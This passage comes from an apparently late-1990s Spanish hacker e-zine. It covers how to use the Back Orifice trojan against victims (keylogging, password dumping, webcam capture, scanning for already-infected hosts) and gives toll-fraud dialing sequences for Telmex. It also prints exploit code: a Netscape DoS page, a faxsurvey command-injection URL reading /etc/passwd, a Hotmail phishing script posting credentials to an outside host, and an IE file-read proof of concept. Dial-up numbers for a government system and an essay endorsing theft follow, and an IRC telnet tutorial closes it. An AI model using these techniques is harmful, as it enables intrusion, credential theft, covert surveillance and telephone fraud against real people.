puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo cierras
primero con httpoff y el puerto que tenga abierto. Pero, como sabes el 
puerto que tiene abierto? un scaneado? Ejecutas el httpon  y te dice el 
estado del http y el puerto es decir, le cierras los puertos que tenga 
abiertos y luego le abres el 80.

Mas comandos (traducido de la documentacion que acompaa al BO):
Recuerda que en todo momento hablamos del cliente de texto, el boclient.exe.

appadd   Lanza una aplicacion de texto en un puerto tcp. Para controlar una 
	 aplicacion dos o de texto (como el command.com) via telnet.

appdel   evita que una aplicacion oiga las conexiones.

applist  Da un listado de las aplicaciones que escuchan la conexion en ese 
	 momento.

md       Crea un directorio.

dir      muestra los archivos y directorios.

rd       Borra un directorio.

shareadd Crea un export en el servidor.

sharedel Borra un export.

copy     Copia archivos.

del      Borra archivos.

find     Busca en el arbol los archivos.

freeze   Comprime un archivo

melt     Descomprime un archivo comprimido con freeze.

view     Visor del contenido de un archivo.

httpoff  Cierra el servidor http.

httpon   Abre el servidor http.

keylog   Logea las teclas que se aprietan en el servidor (victima) a un
	 archivo de texto. El log muestra el nombre de la ventana en que
	 se tecleo el texto.

keylog   stopend Acaba el log de teclado.

capavi   Captura video y audio de un dispositivo a un archivo .avi

capscreen Captura una imagen de la pantalla del server a formato .bmp

listcaps  da un listado de los dispositivos de entrada de video.

sound     ejecuta un archivo de sonido en el servidor (Te lo imaginas?).

netlist   Listado de las conexiones de red.

netdisconnect Desconecta el servidor de una red.

netconnect Conecta el servidor a una red.

netview  Ve todas las interfaces de red, servidores, dominios .

ping Hace ping al host. Da el nombre del host y la version del vo.

pluginexec Ejecuta un plugin para BO.

pluginkill Cierra el plugin.

pluginlist Da un listado de los plugin activos.

prockill   Finaliza un proceso.

proclist   Listado de los procesos en curso.

procspawn  Ejecuta un programa.

rediradd  Redirecciona los paquetes ip entrantes a otra ip

redirdel Para el redireccionamiento.

redirlist Listado de puertos de rediccionamiento activos

regmakekey Crea una entrada en el registro

regdelkey Borra una entrada en el registro.

regdelval Borra un valor del registro.

reglistkeys Listado sub llaves de una llave del registro

reglistvals Listado de los valores de una llave del registro

regsetval establece el valor de una llave del registro

resolve resuelve la direccion ip del server

dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok

info Da la informacion completa del server

lockup cierra el server

passes Muestra las contraseas del usuario actual y la del salvapantallas.
	Pueden contener basura al final.

reboot Apaga el server y lo reinicia. XDDD

tcprecv Conecta el server a una ip concreta y guarda la data recivida de esa 
	conexion al archivo especificado.

tcpsend conecta el server a una ip, manda el contenido del archivo 
	especificado y cierra la conexion


Bueno, ya vemos que se pueden hacer maravillas. Ver epigrafe 9.

8 - Me puedo aprovechar del trabajo de otros?

Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el troyano).
Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si te 
funciona el comando dir, esta infectado!!! O sea, que estas dentro.
 
Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios 
detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad 
troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta un 
login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio 
informando ademAs de la IP del "afortunado galardonado" con el troyano.

9 - Puedo formatearle el Disco Duro?

Os pido encarecidamente que no os paseis. No hagais putadas.
Robad fotos porno, cread un dir "Pervertido" o "Mehemetidoentuvida".
Intentad acceder al cdrom. Ejecutadle un archivo de sonido. 
Que flipe, pero no abuseis.
Si hace un Netstat vera vuestra ip. Y sabeis que con la IP, y la hora en
que ocurrio todo, el ISP y Timonica, de la mano como hermanos, os pueden 
recomendar un bello hotelito... lo de siempre, precaucion. 

Apendice - Como puedo escribir mi propio plugin para Back Orifice?
   (Traduccion del original que acompaa al programa)

Para escribir tu propio plugin para el Back Orifice, solo tienes que crear
una DLL con funciones del tipo:

char *YourFunc(int *active, char *args)

El comando de ejecucion del plugin te permite especificar una dll y un nombre
de funcion del tipo: "dll:_Function". El resto de los parametros son pasados
a tu funcion en los args de los parametros. La unica cosa de la que se ocupa
tu aplicacion es de monitorizar la int al que apunta el activo.
Si ese valor se vuelve 0, el usuario ha pedido que el plugin termine y tu
funcion deberia restablecerse en lo mas rapidamente posible en cuanto se 
cierre todo lo que haga falta ser cerrado.
Tu programa puede devolver NULL, o puede devolver a un pointer que apunte a
un bufffer estatico que contenga un mensaje de texto que sera ofrecido al 
usuario.
La DLL no se cargara hasta que el texto se copie desde ese buffer.
Y eso es todo lo que hay.


Nota de los autores:
Los acentos se han omitido en aras de la compatibilidad.
La traduccion de la documentacion original ha resultado dificultosa y ha 
originado giros linguisticos imposibles. A aquellos mas familiarizados con
textos tecnicos, o que hayan detectado faltas al rigor, se les pide su 
colaboracion.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               <<FuCKiNG TeLMeX>>
                           (Aportacion de Juan Pablo)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Paso 1. Marcar el telfono 629-99-10,
Paso 2. Cuando suene una Voz ...
Paso 3. En seguida Marcar 8019, y
Paso 4. Cuando suene un Tono, en seguida...
Paso 5. Marcar la Lada del Pais y/o Regin , y por ltimo ...
Paso 6. Marcar el Telfono deseado + el botn con la 
siguientefigura # (Gato).


CASO II

Paso 1. Marcar el telfono 258-65-01 + el botn con la
siguiente figura#(Gato).
Paso 2. Cuando suene un Tono , enseguida ...
Paso 3. Marcar 02641414866960, despus ...
Paso 4. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 5. Marcar el Telfono deseado.


CASO III

Paso 1. Marcar el telfono 725-63-99,
Paso 2. Cuando suene un Tono ...
Paso 3. En seguida Marcar 00.
Paso 4. Esperar otro Tono y ...
Paso 5. En seguida volver a Marcar 00, despus ...
Paso 6. Marcar la Lada del Pas y/o Regin y por ltimo ...
Paso 7. Marcar el telfono deseado.


CASO IV

Paso 1. Marcar el telfono 258-65-01 + el botn con la
siguiente figura# (Gato) .
Paso 2. Cuando suene una voz, en seguida
Paso 3. Marcar 02641414866960, despus ...
Paso 4. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 5. Marcar el Telfono deseado.


CASO V - A

Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 098 (Lada Internacional) y por ltimo ...
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).


CASO V - B

Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 095 (Lada USA-CANADA) y por ltimo ... 
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).


CASO V - C

Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 098 (Lada Nacional) y por ltimo ...
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).


CASO VI

Paso 1. Marcar el telfono 91-800-01-670.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 94678, 
Paso 4. Cuando suene un Tono, en seguida
Paso 5. Marcar 55,
Paso 6. Cuando suene un Tono, en seguida
Paso 7. Marcar 98, por ltimo ...
Paso 8. Marcar el Telfono deseado.
NOTA IMPORTANTE : Este Caso (VI) Slo se aplica
en llamadas Internacionales (Europa y el resto del
mundo, exceptuando Estados Unidos y Canada).


CASO VII

Paso 1. Marcar el telfono 722-73-56,
Paso 2. Espere y cuando suene una Voz ...
Paso 3. En seguida Marque 7349, 
Paso 4. Espere y cuando suene una voz, 
Paso 5. En seguida Marque 7349, 
Paso 6. Espere y cuando suene un Tono, 
Paso 7. En seguida Marque 0 (cero), 
Paso 8. Espere y cuando suene un Tono, 
Paso 9. Marque la Lada del Pais y/o Regin , y por ltimo ... 
Paso 10. Marque el Telfono deseado.


CASO VIII

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 100-54 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 1054 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


CASO IX

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 200-26 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 2026 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


CASO X

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-31 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3031 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


CASO XI

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-38 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3038 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


CASO XII

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-51 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3051 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


CASO XIII

Paso 1. Marcar el telfono 91-800-92-450 + el botn con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-26 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3026 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

		   ----------------------
		--- Reflexiones de nadie --- ---------------
		   ----------------------  -- Por: Mr.Nexus --
					     ---------------

        Esta tarde sali a la calle, apareci en el mundo real, como tantas
veces, y como siempre me canse de l.
       Vaya un mundo real en el que la gente solo piensa en matarse los unos a 
los otros, me da vergenza pertenecer a un grupo de personas asi, por que 
diablos tiene que haber tanta violencia en nuestra sociedad?, gente que solo 
piensa en hacer dao a los dem s (eso de los fines educativos debe ser una 
utopia), y personas? que no tienen m s cerebro que el necesario como para 
decir las payasadas que salen por sus bocas, en fin... espero que cuando 
crezcan maduren y no se queden tan ... gilipollas.

        Por la noche me conecto a la red, por fin! llevaba todo el dia 
pensando en lo que iba a hacer, lo que me iba a bajar, lo que iba a probar, 
bien! me voy sintiendo como en casa, al fin y al cabo ... esta es mi casa, 
aqui es donde me siento bien, donde me siento a gusto con la gente, gente que 
aqui no son mas que un apodo que se ponen ellos mismos, son gente ... somos 
gente que dejamos atras nuestros prejuicios, nuestros problemas, ...

        Pero aaah!, que gran decepcion, ahora Internet se esta expandiendo y 
regalan conexiones con las cajas de galletas, qu hace esto?, pues facil 
respuesta, esto hace que todo el mundo que tenga ordenador y modem se pueda 
conectar, vaya! esto ya no me gusta, empiezo a verme rodeado de esos 
gilipollas del mundo real que olvid al entrar en mi mundo. Malditos sean! es 
que no se puede estar tranquilo en el IRC, por ejemplo, sin que venga algun 
payaso a insultarte, nukearte, ...
	La respuesta es no, con lo f cil que es ahora entrar en la red, Toda 
esa gentuza indeseable se mete en nuestro mundo, si!, seguro que alguno de 
esos cabrones esta leyendo estas lineas y ahora esta diciendo, bufff! Pues 
tienes razon, esta conducta no lleva a nada, ... pero cuando apague su 
ordenador seguir  llendo por ahi con la violencia en las manos y la estupidez 
en la cabeza, y mas tarde ... cuando se conecte con el bancotal o con el 
bancocual a Internet seguir  haciendo lo mismo, pero de otra manera, 
aprovechadote de la gente que ha desarrollado nukes (por ejemplo) por el puro 
af n de superacion, abusando de la gente que te da el op en algun canal, ... 
tan solo son unos pobres hombrecillos.

	Hey!, tu!, lector!, acaso no piensas como yo?, dime la verdad, a quien 
le interesa ir por ahi molestando a la gente?, ir por ahi tan solo buscando 
problemas?, no lo sabes?, yo te lo dir, a los pobres de mente que se dejan 
llevar por las modas, por los estereotipos, a los pringaos que solo piensan en 
hacer dao a los dem s sin causa aparente.

	Hey! no pienses que soy un flojo y un lila, jaja! bueno, un poco si, 
... tan solo me gustaria vivir en un mundo en el que no existiera la 
violencia, las guerras, el hambre, las masacres de humanos iguales que 
nosotros pero con la *mala suerte* de haber nacido en otro lugar; me gustaria 
vivir en un mundo sin racismo, sin prejuicios, sin gentuza a la que solo le 
interesa su propio beneficio, y a ti? no te gustaria vivir en ese mundo?, si.
	Antes ese mundo era el cyberespacio, un sitio bonito, agradable, 
curioso, moderno, infinito, ... perfecto, pero entonces llegaron ellos, y nos 
tuvieron que joder el invento, ... gentuza ...
        Desde aqui tan solo puedo regocijarme en mis pensamiento que, por 
ahora, son solo mios, pero tambin puedo decirte que no te rindas amigo 
hacker, lo que haces es la aficion mejor remunerada del mundo, como? que no 
ganas dinero? ya lo se, pero no se trata de eso verdad? , y ese afan de 
superacion? , esa curiosidad satisfecha? eres simplemente admirable, y por eso 
quiero ser como tu, tu el hacker, no creo que a nadie le importe que 
transfieras a tu cuenta varios millones del dinero que ha acumulado un sucio 
chupon que ha explotado a sus trabajadores, o un politico que se ha llenado 
sus bolsillos con el dinero de los ciudadanos, creme, nadie reprocharia tal
acto.
	Por todo lo que hacen los hackers autenticos, os admiro, admiro a la 
gente de Raregazz, porque de veras comparten su conocimiento; admiro a los 
componentes de X-ploit, porque reclaman derechos humanos; admiro a Cy de 
CyberHack, porque no se calla al criticar a esos que se aprovechan del trabajo 
de los dem s; ... y asi a todos aquellos que se esfuerzan en superarse dia a 
dia porque sois geniales, hummm, por que no decirlo? Somos geniales, estamos 
muy por encima de toda esa gente que solo busca ... bah! tonterias.

        Bueno, esto se acaba, sino seguro que te duermes, en fin tan solo Una 
ultima cosa, te pido que si *realmente* piensas como yo, ... como nosotros, 
unete a nosotros, todavia quedan lugares en la red a los que esta Restringido 
el paso a los debiles de mente, se fuerte!, resiste las acometidas de una 
sociedad que da asco y rebelate!, tomaremos sus sistemas, exterminaremos las 
plagas de bastardos, es contra ellos contra los que tienes que rebelarte! y 
cuando te canses, disfruta de la compaia de la buena gente con la que te vas 
cruzando a lo largo de tu vida, esos son tus amigos, nosotros somos tus 
amigos.

   ------------------------------------------------------------------------
     Para cualquier critica,    "Las guerras las declaran los gobiernos
     alabanza o correccion:           y las sufren los pueblos"
                                  Cristina Almeida (politica Espaola)
       mrnexus@cyberdude.com          ^-- parece mentira eh? --^
	-----------------------------------------------------
	   ------------ Insultos a dev/null --------------
		----------------------------------

  ͻ
                              BUGS Y EXPLOITS                             
                                 por PaTa                                 
  ͼ

-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x                                             
Objetivo:     DoS usando nested tables demtro de etiquetas span
Parche:       -
Creditos:     Leonid Ksido
Descripcion:  Testeado en Communicator 4.05 en Linux Slackware 3.4, y
	      Navigator 4.05 en Windows 98
Codigo:
		    <HTML>
		    <SPAN  STYLE="position:absolute; LEFT:0">
		    <TABLE BORDER="0" WIDTH=100%>
		    <TR>
		    <TD>
		    <TABLE>
		    <TR>
		    <TD>
		    </TD>
		    </TR>
		    <TR>
		    <TD>
		    <TABLE>
		    <TR>
		    <TD>
		    </TD>
		    </TR>
		    </TABLE>
		    </TD>
		    </TR>
		    </TABLE>
		    </TD>
		    </TR>
		    </TABLE>
		    </SPAN>
		    </HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: CGI-Script
Objetivo:     Ejecutar comandos de forma remota
Parche:       Quitar `faxsurvey.orig'
Creditos:     Tom <dod@MUENSTER.NET>
Descripcion:  Existe un bug en el "faxsurvey" CGI-Script, que permite 
	      ejecutar comandos en el servidor HTTP
	      Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux. 
Codigo:       http://joepc.linux.elsewhere.org/cgi-
bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo:     DoS
Parche:       ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-
5.1/linuxconf-1.11r19-1.i386.rpm
Creditos:     Alex Mottram
Descripcion:  Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 
si lo
	      actualizas desde el FTP de RedHAT.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: HOTMAIL
Objetivo:     Obtener las claves de los usuarios
Parche:       Descativar Java
Creditos:     Tom Cervenka
Descripcion:  Mediante al ejecucion de un codigo en java malicioso al leer
	      los mensajes con el navegador que estemos usando, que fuerza
	      al usuario a volver a registrarse e introducir de nuevo su
              cuenta y su contrasea, sin saber que en realidad esta mandando
	      al atacante estos datos.
Codigo:
			 <html><head></head><body>
			 <p>"Go where you want today" - Blue Adept</p>
			 <script>
			 function getmess(){
			 return "<table border=0 cellpadding=5 cellspacing=5 
width=508
			 height=90%>" +
			 "<tr valign=middle>" +
			 "<th colspan=2>" +
			 "<font face=\"Arial, Helvetica\" size=\"5\">" +
			 "We're Sorry, We Cannot<br>Process Your Request" +
			 "</font></th></tr>" +
			 "<tr valign=middle><td align=center>" +
			 "<font face=\"Arial, Helvetica\" size=\"3\">Reason: 
</font>" +
			 "<font face=\"Arial, Helvetica\" size=\"3\"
			 color=\"#ff0000\"><b>Time expired. Please re-
login.</b></font><br>"
			 +
			 "<font face=\"Arial, Helvetica\" size=\"2\"><a
			 href=\"http://www.hotmail.com/errormsg.html\">(Get 
more info
			 regarding error messages here)</a></font>" +
			 "</td></tr>" +
			 "<tr valign=\"middle\"><td align=\"center\">" +
			 "<FORM METHOD=POST
			 ACTION=\"http://www.geocities.com/cgi-
bin/homestead/mail.pl?ybwc\"
			 target=\"_top\">" +
			 "<INPUT TYPE=\"hidden\" NAME=\"next-url\"
			 VALUE=\"http://www.hotmail.com\">" +
			 "<INPUT TYPE=\"hidden\" NAME=\"subject\" 
VALUE=\"Hotmail
			 Password\">" +
			 "<table cellpadding=\"0\" cellspacing=\"5\" 
border=\"0\">" +
			 "<tr><td><font face=\"Arial, Helvetica\" 
size=\"2\">Login
			 Name:</font><br><input type=\"text\" name=\"login\" 
size=\"16\"
			 maxlength=\"16\"></td><td><font face=\"Arial, 
Helvetica\"
			 size=\"2\">Password:</font><br><input 
type=\"password\"
			 name=\"passwd\" size=\"16\" maxlength=\"16\"> <input
			 type=\"submit\" value=\"Enter\"></td><tr>" +
			 "</table></form></td></tr>" +
			 "<tr valign=middle><th colspan=2 align=center>" +
			 "<font face=\"Arial, Helvetica\" size=\"3\">" +
			 "Return to <a 
href=\"http://welcome.to/www.hotmail.com\"
			 target=\"_parent\">Hotmail's Homepage</a>." +
			 "</font></th></tr></table>" +
			 "<p><img src=\"http://209.1.112.251/c9698.gif\" 
width=189 height=16
			 border=0 alt=\"Copyright 1996-1997\">";
			 }
			 
			 nomenulinks=top.submenu.document.links.length;
			 for(i=0;i<nomenulinks-1;i++){
			 top.submenu.document.links[i].target="work";
			 
top.submenu.document.links[i].href="javascript:getmess()";
			 }
			 
			 noworklinks=top.work.document.links.length;
			 for(i=0;i<noworklinks-1;i++){
			 top.work.document.links[i].target="work";
			 
top.work.document.links[i].href="javascript:getmess()";
			 }
			 
			 </script>
			 </body>
			 </html>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win98
Objetivo:     Efecto 2000
Parche:       No encender el ordenador en Noche Vieja
Creditos:     -
Descripcion:  El bug aparece cuando Windows 98 es reiniciado entre las 23:59
	      y las 00:00 y hace que el ordenador salte uno o dos dias hacia
	      atras, de pendiendo de la hora exacta de reset. Por ahora esto
	      solo ocuure el 31 de Diciembre.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa:  Internet Explorer 
Objetivo:      Leer ficheros locales
Parche:        http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos:      Georgi Guninski
Descripcion:   Esta nueva vulnerabilidad permite a una p gian Web diseada
	       maliciosamente leer archivos de texto o html del ordenador del
	       usuario y enviar sus contenidos a un host arbitrario, incluso
	       cuando el usuario se encuentra detr s de un firewall. El
	       agujero explota un error de seguridad en los frames y se basa
               en la utilizacion de instrucciones en JavaScript. Para que
	       funcione se debe conocer de antemano el nombre y camino
	       completo del fichero que se quiere leer, cosa nomuy dificil.

	       Versiones afectadas:
	       - Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
		 Windows NT 4.0, Windows 95
	       - Microsoft Windows 98, Internet Explorer iontegrado
		 (version 4.01 SP1)
	       - Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
		 y Windows NT 3.51
	       - Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
	       - Microsoft Internet Explorer 3.x
Codigo:

<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer
4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>

<SCRIPT LANGUAGE="JAVASCRIPT">
alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\"
)
");
</SCRIPT>
</BODY>
</HTML>


[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                               $$$$$                $$
      "$$$$$$$$$$$$$$$"           $$       ooo    $$$$$ooo         oooo
        "$$$$$$$$$$"             "$$"   o$$   $$o "$$$$$$$$$ $$$$$$$$$$
 $$       "$$$$$$"       $$       $$oo $$$$$$$$$$o  """          o$$$"
 $$$o      "$$$$"       $$$      o$$"  $$$"""$$""   $$$         oooo
 $$$$oo     $$$$      $$$$$   ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
 $$$$$$$ooo  $$  ooo$$$$$$$    """"""""   """"""    """""""" """"""""""
 $$$$$$$$$$$$$$$$$$$$$$$$$$  oooo                                ooo
 $$$$$$$"""  $$o """$$$$$$$  ""$$                                $$$$
 $$$$""     $$$o     ""$$$$    $$$oooo      $$$$$$$o     oooooo   $$$ oooooo
 $$$"      o$$$$o      "$$$   "$$$$""$$o       "$$$$   o$$""$$$$  $$" $$$"""
 $$       o$$$$$$$       $$    $$$$  $$$ "$$$$""$$$$  $$$     ""  $$$$$$ ""
        o$$$$$$$$$$o           $$$   $$o  $$$o o$$$$o $$$         $$"" $$o
     o$$$$$$$$$$$$$$$$o       o$$$$$ $$$$$  """" """""" "$$$$$$$" $$$$  $$$$$o

\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/

 Pues bien, aqui esta de nuevo esta vieja seccion, espero que les guste y
 que me ayuden a mantenerla viva.....

 Lo que sigue es un sistema que al parecer los seores de X-ploit TEAM lo han
 de conocer muy bien, es cenids.ssa.gob.mx y aqui esta una lista de telefonos
 y velocidades a las que puedes conectarte:

        14,400 bps :           9,600 bps:              2,400 bps:

          563-8471             598-7761                598-1467
          563-7895             598-1010                598-4208
          563-8405
          563-9404

     Bueno pues por esta ocasion eso es todo, esperamos contar con su apoyo
 para hacer crecer esta seccion.

 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                    ------------------------------
                     Accediendo al IRC por telnet
                             por Senpai
                    ------------------------------

Alguna vez has pensado como se comunica tu cliente de IRC (el mIRC por ej.)
con el servidor de IRC?. No? Yo tampoco hasta que tuve una conversacion en
la Under con jcl (un saludo chavalote!).


Conectarse al IRC con el telnet
-------------------------------
Si te conectas al IRC via telnet, puedes saber exactamente que cosas le
envias al servidor, y que cosas te envia el servidor a ti, con un cliente de
irc todo esto lo pierdes, simplemente te conectas, chateas un rato, y te vas;
pero como estamos aprendiendo lo mejor es saber como funcionan las cosas, y
no hacer como si fueran una "caja negra" de donde entran y salen mensajes.

Vamos a la practica
-------------------
Lo primero que quiere de ti un servidor de IRC es un password (opcional), y
un nick. Una vez le has proporcionado estos datos, te envia un ping al que
tienes que responder (si no respondes te desconecta!), y despues de hacer
esto le tienes que enviar un mensaje identificando el usuario (tu).

Vamos a ver esto con un ejemplo real:
Ejecuta algun programa de telnet, y haz telnet al servidor de IRC. Tendras
que usar algun puerto que tengan destinado a IRC (normalmente el 6667 lo
tienen todos disponible).

Una vez hecho esto, te conectara, pero no aparece nada por pantalla.

Dale un password (el que quieras, da igual). La sintaxis es:
PASS password
Ej:
	PASS hola

Despues le das el nick que quieras.
Sintaxis: NICK nick
Ej:
	NICK pableras

Si el nick esta ocupado el servidor te enviara un mensaje para que pongas
otro.

Una vez el servidor acepta el nick, te envia un PING con un numerito, algo
asi:
PING :11528997809137948565

y tu te tienes que responder con un PONG y el numerito. Escribe:
PONG 11528997809137948565

Date prisa en responder, porque si no te desconecta por "ping timeout".

El servidor te enviara un ping de este tipo de forma periodica mientras
estes conectado, cada vez que te envie uno, tienes que responderlo, que si
no te desconecta.

Una vez echo esto le tienes que enviar un mensaje de USER.
Sintaxis: USER NombreDeUsuario NombreDelHost NombreDelServidor NombreReal

Atencion al poner el nombre real, debes poner dos puntos(:) antes.
Ej:
	USER pepe aki alli :Pepito de los palotes

Una vez hecho esto te enviara un mensaje de bienvenida.
Esto es un trozo de un log real:

pass dsthgdi
nick pep_1
PING :11528277839637248565
pong 11528277839637248565
user sol solo sol :TO
:fenix.irc-hispano.org 001 pep_1 :Welcome to the Internet Relay Network pep_1
:fenix.irc-hispano.org 002 pep_1 :Your host is fenix.irc-hispano.org, running version u2.9.32
:fenix.irc-hispano.org 003 pep_1 :This server was created Fri Feb 7 1997 at 17:07:32 MET
:fenix.irc-hispano.org 004 pep_1 fenix.irc-hispano.org u2.9.32 dioswk biklmnopstv
:fenix.irc-hispano.org 251 pep_1 :There are 2151 users and 1382 invisible on 21servers
:fenix.irc-hispano.org 252 pep_1 7 :operator(s) online
:fenix.irc-hispano.org 253 pep_1 6 :unknown connection(s)
:fenix.irc-hispano.org 254 pep_1 1185 :channels formed
:fenix.irc-hispano.org 255 pep_1 :I have 359 clients and 1 servers
:fenix.irc-hispano.org NOTICE pep_1 :Highest connection count: 690 (689 clients)
:fenix.irc-hispano.org 375 pep_1 :- fenix.irc-hispano.org Message of the Day
:fenix.irc-hispano.org 372 pep_1 :- 14/10/1997 12:21
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Bienvenidos al servidor de IRC de Arrakis
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- -----------------------------------------
				.
				.
		Aqui siguen muchas lineas de bienvenida..
				.
				.
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Esta es la politica de este servidor:
:fenix.irc-hispano.org 372 pep_1 :- puertos 6665, 6666, 6667, 6668 y 6669.
:fenix.irc-hispano.org 372 pep_1 :-   Por favor repartiros por estos puertos, :fenix.irc-hispano.org 372 pep_1 :- con ello. Gracias.
:fenix.irc-hispano.org 372 pep_1 :-
------------------------------------------
:fenix.irc-hispano.org 376 pep_1 :End of /MOTD command.


Por fin! ya estamos conectados! Con el mIRC es mas facil eh....

Ahora ya estamos conectados al IRC, solo nos falta entrar en algun canal a
ver lo que se cuece no?, pues vamos alla.
El comando para entrar es JOIN canal.
Ej:
JOIN #el_amor_universal

Una vez entramos dentro de un canal empezaremos a ver lo que se esta hablando
Ahi va otro pedazo de log como ejemplo:

join #mexicano
:pep_1!~sol@ppp136.207.redestb.es JOIN :#mexicano
:fenix.irc-hispano.org 332 pep_1 #mexicano :joroa que joroa
:fenix.irc-hispano.org 333 pep_1 #mexicano Rommel 908311068
:fenix.irc-hispano.org 353 pep_1 = #mexicano :pep_1 @senpai @ChemiX @Rommel
@Thays @Scytale
:fenix.irc-hispano.org 366 pep_1 #mexicano :End of /NAMES list.
:Scytale!Scytale@theilax.arrakis.es NOTICE pep_1 :Bienvenido a #mexicano. El dia 3 este canal estara cerrado con motivo de la huelga de Internet. Secundala! Joroa que Joroa!
